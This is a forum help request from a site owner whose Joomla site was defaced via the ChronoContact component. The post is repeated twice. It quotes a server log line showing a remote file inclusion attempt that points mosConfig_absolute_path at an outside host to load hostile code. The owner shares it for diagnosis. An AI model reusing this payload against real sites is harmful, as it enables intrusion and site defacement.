Hi Guys,
Our site recently got hacked, and some spurious advertising based HTML was added to our main Joomla index.php file.
From what our hosts have discovered, it seems that they are exploiting something in Chronoforms and adding malicious script through there. They specifically tied it down to a log entry as follows (although this is repeated multiple times in the log):
GET //index.php//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet
.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 403 356 "-" "Mozilla/5.0"
This happened at around the same time that the site was hacked and there are no other odd entries at a similar time.
We're running:
Joomla 1.5.12
ChronoContact 3.1 RC5.5
I've read of other vulnerabilites in the Excel Writer section of ChronoContact that were fixed in previous versions. Are there more vulnerabilities that need to be fixed?
Can you help fix this issue?
Cheers,
Jon
Our site recently got hacked, and some spurious advertising based HTML was added to our main Joomla index.php file.
From what our hosts have discovered, it seems that they are exploiting something in Chronoforms and adding malicious script through there. They specifically tied it down to a log entry as follows (although this is repeated multiple times in the log):
GET //index.php//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet
.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 403 356 "-" "Mozilla/5.0"
This happened at around the same time that the site was hacked and there are no other odd entries at a similar time.
We're running:
Joomla 1.5.12
ChronoContact 3.1 RC5.5
I've read of other vulnerabilites in the Excel Writer section of ChronoContact that were fixed in previous versions. Are there more vulnerabilities that need to be fixed?
Can you help fix this issue?
Cheers,
Jon